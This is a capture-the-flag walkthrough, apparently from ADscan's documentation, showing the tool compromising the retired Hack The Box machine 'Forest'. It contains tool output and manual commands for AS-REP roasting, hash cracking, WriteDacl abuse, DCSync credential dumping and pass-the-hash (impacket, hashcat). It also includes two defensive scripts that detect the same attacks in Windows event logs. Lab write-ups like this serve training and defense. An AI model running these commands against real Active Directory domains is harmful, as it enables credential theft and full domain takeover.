
CTF Walkthrough - Auto-Pwning HTB Forest

Automatically pwn Hack The Box Forest machine using ADscan in 3 minutes

This guide demonstrates how ADscan can automatically pwn the retired Hack The Box machine "Forest" in approximately 3 minutes.

Lab Information

  • Machine: Forest (Retired)
  • Difficulty: Easy
  • OS: Windows Server 2016
  • Domain: htb.local
  • IP: 10.10.10.161 (example - use your HTB assigned IP)

Prerequisites

  • ✅ ADscan installed and configured
  • ✅ VPN connection to Hack The Box network
  • ✅ tun0 interface active

Walkthrough

Step 1: Initial Setup

Start ADscan and create a workspace:

# Start ADscan with verbose mode
adscan start -v

# Create workspace for this machine
(ADscan) > workspace create htb_forest
(ADscan:htb_forest) >

Step 2: Configure Scan Parameters

# Set VPN interface
(ADscan:htb_forest) > set iface tun0

# Set target IP
(ADscan:htb_forest) > set hosts 10.10.10.161

# Enable automatic mode for speed
(ADscan:htb_forest) > set auto True

Step 3: Start Unauthenticated Scan

(ADscan:htb_forest) > start_unauth

What happens automatically:

[*] Starting unauthenticated scan...
[+] Discovered domain: htb.local
[+] Primary Domain Controller: FOREST.htb.local (10.10.10.161)
[*] Enumerating users via RPC...
[+] Found 31 domain users

Users discovered:
  - Administrator
  - Guest
  - krbtgt
  - svc-alfresco
  - sebastien
  - lucinda
  - andy
  - mark
  ...

[*] Checking for AS-REP roastable accounts...
[+] Found AS-REP roastable account: svc-alfresco
[*] Extracting AS-REP hash...
[+] Hash saved: $krb5asrep$23$svc-alfresco@HTB.LOCAL:...

[*] Attempting to crack hash...
[*] Using wordlist: rockyou.txt
[+] Password cracked: s3rvice

[+] Credentials found!
    Username: svc-alfresco
    Password: s3rvice

[*] Automatically escalating to authenticated scan...

Step 4: Authenticated Enumeration (Automatic)

ADscan automatically continues with authenticated enumeration:

[+] Authenticating as svc-alfresco...
[+] Authentication successful

[*] Enumerating domain users...
[+] Found 31 users

[*] Enumerating domain computers...
[+] Found 1 computer (FOREST.htb.local)

[*] Performing Kerberoasting...
[!] No kerberoastable accounts found

[*] Collecting BloodHound data...
[+] BloodHound data collected successfully

[*] Analyzing BloodHound data for privilege escalation paths...
[+] Found path to Domain Admin!

Path:
  svc-alfresco (Current User)
  └─> Service Accounts (Member)
      └─> Privileged IT Accounts (Member)
          └─> Account Operators (Member)
              └─> Exchange Windows Permissions (WriteDacl)
                  └─> Domain Admins (DCSync Rights)

[*] Exploitation path identified: Exchange Permissions Abuse

Step 5: Privilege Escalation (Automatic)

ADscan exploits the identified path:

[*] Executing privilege escalation...

[*] Step 1: Creating user in Exchange Windows Permissions group
[+] User 'adscan_temp' created

[*] Step 2: Granting DCSync rights to adscan_temp
[+] DCSync rights granted

[*] Step 3: Performing DCSync attack
[*] Dumping domain credentials...
[+] Administrator NTLM hash captured:
    aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c

[*] Step 4: Authenticating as Administrator
[+] Domain Admin access achieved!

[*] Dumping all domain hashes...
[+] 31 hashes dumped

[*] Looking for flags...
[+] User flag: c052e7e5a12345...
[+] Root flag: 7a89be2d9cf1...

[✓] Forest pwned in 2m 47s

Step 6: View Discovered Credentials

View all credentials discovered during the attack:

# Display all discovered credentials
(ADscan:htb_forest) > creds show

# TODO: Add real output from 'creds show' command
# Expected to show:
# - svc-alfresco with password 's3rvice'
# - Administrator NTLM hash
# - Other domain user hashes

Attack Chain Breakdown

1. AS-REP Roasting

Vulnerability: the svc-alfresco account has Kerberos pre-authentication disabled, so an AS-REP for it can be requested without knowing the password and the encrypted part cracked offline

Exploitation:

# ADscan automatically:
# 1. Identifies AS-REP roastable accounts
# 2. Requests AS-REP hash
# 3. Cracks hash offline
# 4. Gains initial access
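The same request that produced the $krb5asrep$23$ hash above is recorded on the domain controller as Security event 4768. The following script is an added example (not ADscan code) that shows how a defender spots AS-REP roasting in those events and audits which accounts are exposed. The event records and the sAMAccountName-to-userAccountControl mapping are constructed for the example; the field names match the 4768 event schema.

```python
"""Added example (not ADscan code): spot AS-REP roasting from Kerberos audit events.

An AS-REP hash beginning $krb5asrep$23$ uses Kerberos encryption type 23 (RC4-HMAC).
On a domain controller the request is logged as Security event 4768 (TGT requested).
Two fields give the technique away:
  PreAuthType=0              no pre-authentication was performed
  TicketEncryptionType=0x17  RC4 was negotiated (the cheapest etype to crack)
Only successful requests (Status=0x0) matter: every normal Windows client first
sends an AS-REQ without pre-auth and is answered with Status=0x19
(KDC_ERR_PREAUTH_REQUIRED), so that failure is noise, not an attack.
"""
import re
from dataclasses import dataclass

# userAccountControl bit that disables Kerberos pre-authentication
DONT_REQ_PREAUTH = 0x400000

# Constructed sample 4768 records in key=value form (not real DC output).
SAMPLE_EVENTS = [
    # normal client: first round-trip without pre-auth, rejected with 0x19
    "EventID=4768 TargetUserName=andy IpAddress=::ffff:10.10.10.50 "
    "TicketEncryptionType=0x12 PreAuthType=0 Status=0x19",
    # same client retrying with pre-auth and an AES ticket: fine
    "EventID=4768 TargetUserName=andy IpAddress=::ffff:10.10.10.50 "
    "TicketEncryptionType=0x12 PreAuthType=2 Status=0x0",
    # roasting: account without pre-auth, RC4 requested, TGT issued
    "EventID=4768 TargetUserName=svc-alfresco IpAddress=::ffff:10.10.14.5 "
    "TicketEncryptionType=0x17 PreAuthType=0 Status=0x0",
    # a different event type, must be ignored
    "EventID=4769 TargetUserName=andy@HTB.LOCAL ServiceName=cifs/forest "
    "TicketEncryptionType=0x12 Status=0x0",
]


@dataclass
class Finding:
    account: str
    client: str
    severity: str  # "high" = no pre-auth and RC4, "medium" = no pre-auth only
    reason: str


_KV = re.compile(r"(\w+)=(\S+)")


def parse_event(line: str) -> dict:
    """Turn one key=value record into a dict."""
    return dict(_KV.findall(line))


def asrep_findings(lines) -> list:
    """Return a Finding for each successful 4768 that skipped pre-authentication."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4768" or ev.get("Status") != "0x0":
            continue
        if ev.get("PreAuthType") != "0":
            continue
        rc4 = ev.get("TicketEncryptionType", "").lower() == "0x17"
        reason = "TGT issued without pre-auth"
        if rc4:
            reason += ", RC4 etype (crackable offline)"
        findings.append(Finding(
            account=ev["TargetUserName"],
            client=ev.get("IpAddress", "?"),
            severity="high" if rc4 else "medium",
            reason=reason,
        ))
    return findings


def preauth_disabled_accounts(accounts: dict) -> list:
    """Audit helper: names whose userAccountControl has DONT_REQ_PREAUTH set.

    Clearing this bit removes the exposure; if a legacy client really needs it,
    the account must carry a long random password so the AS-REP cannot be cracked.
    The input is a constructed sAMAccountName -> userAccountControl mapping.
    """
    return sorted(name for name, uac in accounts.items() if uac & DONT_REQ_PREAUTH)


if __name__ == "__main__":
    for f in asrep_findings(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.account} from {f.client}: {f.reason}")
    # 0x10200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD; 0x410200 adds DONT_REQ_PREAUTH
    print(preauth_disabled_accounts({"svc-alfresco": 0x410200, "andy": 0x10200}))
```

Run it as-is to see the one high-severity finding for svc-alfresco; the rejected first round-trip from andy is deliberately not reported. In production the records would come from a SIEM export of event 4768, and the audit mapping from an LDAP query for userAccountControl.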

2. BloodHound Analysis

Vulnerability: Complex group membership path to Exchange permissions

Path discovered:

svc-alfresco
  → Service Accounts
    → Privileged IT Accounts
      → Account Operators
        → Exchange Windows Permissions (WriteDacl)
          → DCSync Rights

3. WriteDacl Abuse

Vulnerability: Exchange Windows Permissions has WriteDacl on domain object

Exploitation:

# ADscan automatically:
# 1. Creates a new user (svc-alfresco's Account Operators membership allows this)
# 2. Adds user to Exchange Windows Permissions
# 3. Grants DCSync rights
# 4. Performs DCSync attack
# 5. Captures Administrator hash
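Every step in the list above leaves a record in the domain controller's Security log, which is what a defender uses to reconstruct the chain. The script below is an added example (not ADscan code) that correlates those records around a DCSync event: the extended-right GUIDs are the real well-known replication rights, while the log lines, the timestamp format and the domain controller allowlist are constructed for the example.

```python
"""Added example (not ADscan code): rebuild the WriteDacl -> DCSync chain from audit events.

Security events that correspond to the steps on this page:
  4720         a user account was created
  4728 / 4756  a member was added to a security-enabled global / universal group
  5136         a directory object was modified; a DACL change carries the
               attribute nTSecurityDescriptor
  4662         an operation was performed on an object; DCSync appears as the
               replication control-access rights being exercised on the domain
Replication rights are identified by their extended-right GUIDs. A domain
controller's computer account is expected to use them; anyone else is an alert.
"""
import re
from datetime import datetime, timedelta

# Extended rights that DCSync needs (well-known Active Directory GUIDs)
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Constructed allowlist of domain controller computer accounts
DC_ACCOUNTS = {"FOREST$"}

# Constructed log lines: "<timestamp> key=value ..." (not real DC output)
SAMPLE_LOG = """\
2024-01-01T10:00:00 EventID=4662 SubjectUserName=FOREST$ ObjectType=domainDNS Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2,1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
2024-01-01T10:01:10 EventID=4720 SubjectUserName=svc-alfresco TargetUserName=adscan_temp
2024-01-01T10:01:20 EventID=4756 SubjectUserName=svc-alfresco TargetUserName="Exchange Windows Permissions" MemberName=adscan_temp
2024-01-01T10:01:40 EventID=5136 SubjectUserName=adscan_temp ObjectDN=DC=htb,DC=local AttributeLDAPDisplayName=nTSecurityDescriptor
2024-01-01T10:02:05 EventID=4662 SubjectUserName=adscan_temp ObjectType=domainDNS Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2,1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
2024-01-01T10:02:30 EventID=4662 SubjectUserName=sebastien ObjectType=user Properties=00000000-0000-0000-0000-000000000000
"""

_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_line(line: str) -> dict:
    """Split '<timestamp> key=value ...' into a dict; quoted values may contain spaces."""
    ts, _, rest = line.partition(" ")
    ev = {k: v.strip('"') for k, v in _KV.findall(rest)}
    ev["time"] = datetime.fromisoformat(ts)
    return ev


def replication_rights(ev: dict) -> list:
    """Names of the replication rights present in a 4662 Properties field."""
    guids = set(ev.get("Properties", "").lower().split(","))
    return sorted(REPL_RIGHTS[g] for g in guids if g in REPL_RIGHTS)


def is_dcsync(ev: dict) -> bool:
    """A 4662 exercising replication rights from an account that is not a DC."""
    if ev.get("EventID") != "4662":
        return False
    return bool(replication_rights(ev)) and ev.get("SubjectUserName") not in DC_ACCOUNTS


def reconstruct_chain(log: str, window: timedelta = timedelta(minutes=10)) -> list:
    """For each DCSync alert, collect the preparatory steps for that actor within the window."""
    events = [parse_line(l) for l in log.splitlines() if l.strip()]
    chains = []
    for ev in events:
        if not is_dcsync(ev):
            continue
        actor = ev["SubjectUserName"]
        start = ev["time"] - window
        steps = []
        for e in events:
            if not (start <= e["time"] <= ev["time"]):
                continue
            eid = e.get("EventID")
            if eid == "4720" and e.get("TargetUserName") == actor:
                steps.append(("user_created", e.get("SubjectUserName")))
            elif eid in ("4728", "4756") and e.get("MemberName") == actor:
                steps.append(("added_to_group", e.get("TargetUserName")))
            elif (eid == "5136" and e.get("SubjectUserName") == actor
                  and e.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"):
                steps.append(("dacl_modified", e.get("ObjectDN")))
        steps.append(("dcsync", ", ".join(replication_rights(ev))))
        chains.append({"actor": actor, "time": ev["time"], "steps": steps})
    return chains


if __name__ == "__main__":
    for chain in reconstruct_chain(SAMPLE_LOG):
        print(f"DCSync by {chain['actor']} at {chain['time']}")
        for stage, detail in chain["steps"]:
            print(f"  {stage}: {detail}")
```

On the sample log the script reports a single chain for adscan_temp (created by svc-alfresco, added to Exchange Windows Permissions, DACL of DC=htb,DC=local modified, then both replication rights used) and stays silent on FOREST$, whose replication is legitimate. The 4662 and 5136 events only appear if object-access auditing (SACLs) is enabled on the domain object, which is the configuration step that makes this detection possible.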

4. Pass-the-Hash

Technique: Authenticate as Administrator using NTLM hash

Result: Full Domain Admin access

Manual Mode Alternative

If you prefer more control, use semi-automatic mode:

(ADscan:htb_forest) > set auto False
(ADscan:htb_forest) > start_unauth

# You'll be prompted at each step:
[?] AS-REP roastable account found. Attempt to crack? (y/n): y
[?] Hash cracked. Authenticate with found credentials? (y/n): y
[?] BloodHound path found. Exploit automatically? (y/n): y
[?] DCSync rights obtained. Dump domain hashes? (y/n): y

Timing Breakdown

Automatic mode (auto=True):

  • Unauthenticated scan: ~30 seconds
  • Hash cracking: ~45 seconds
  • Authenticated enumeration: ~30 seconds
  • BloodHound collection: ~20 seconds
  • Privilege escalation: ~40 seconds
  • Total: ~2 minutes 45 seconds

Semi-automatic mode (auto=False):

  • Add ~1-2 minutes for manual prompts
  • Total: ~4-5 minutes

Tips for Other HTB Machines

Active (Retired)

workspace create htb_active
set iface tun0
set hosts 10.10.10.100
start_unauth

# ADscan will:
# - Discover SMB shares
# - Find GPP passwords in SYSVOL
# - Kerberoast Administrator
# - Crack the Kerberoast service ticket and gain DA

Cicada (Retired)

workspace create htb_cicada
set iface tun0
set hosts 10.10.11.35
start_unauth

# ADscan will:
# - Enumerate via RID cycling
# - Identify weak passwords
# - Spray discovered passwords
# - Escalate via ACL abuse

Learning Points

What ADscan Automated

  1. Reconnaissance: RPC user enumeration
  2. Initial Access: AS-REP roasting + hash cracking
  3. Enumeration: BloodHound collection
  4. Analysis: Path finding to DA
  5. Exploitation: WriteDacl abuse + DCSync
  6. Post-Exploitation: Credential dumping

Manual Equivalent

Doing this manually would require:

# 1. User enumeration
rpcclient -U "" -N 10.10.10.161
rpcclient $> enumdomusers

# 2. AS-REP roasting
impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161 -usersfile users.txt

# 3. Hash cracking
hashcat -m 18200 hash.txt rockyou.txt

# 4. BloodHound collection
bloodhound-python -u svc-alfresco -p s3rvice -d htb.local -dc forest.htb.local -c All

# 5. BloodHound analysis (manual GUI analysis)

# 6. WriteDacl exploitation
net rpc user add adscan_temp password -U 'htb.local/svc-alfresco%s3rvice' -S forest.htb.local
# ... multiple manual steps ...

# 7. DCSync
impacket-secretsdump htb.local/adscan_temp@forest.htb.local

# 8. Pass-the-Hash
impacket-psexec -hashes :8846f7eaee8fb117ad06bdd830b7586c administrator@forest.htb.local

Time: 30-60 minutes for an experienced pentester

ADscan: ~3 minutes fully automated

Troubleshooting

"Domain not found"

Ensure VPN connection is active:

ping 10.10.10.161

"Hash cracking failed"

Use a custom wordlist or John the Ripper:

# ADscan will prompt for alternative cracking
[?] Use custom wordlist? (y/n): y
[?] Select wordlist: custom_ad.txt

"BloodHound upload failed"

Ensure BloodHound CE is running:

adscan check
# Should show BloodHound: ✓ Running

Next Steps

  • Try other HTB machines: Active, Cicada, Sauna
  • Join the ADscan Discord to share your time
  • Tweet your asciicast with #ADscan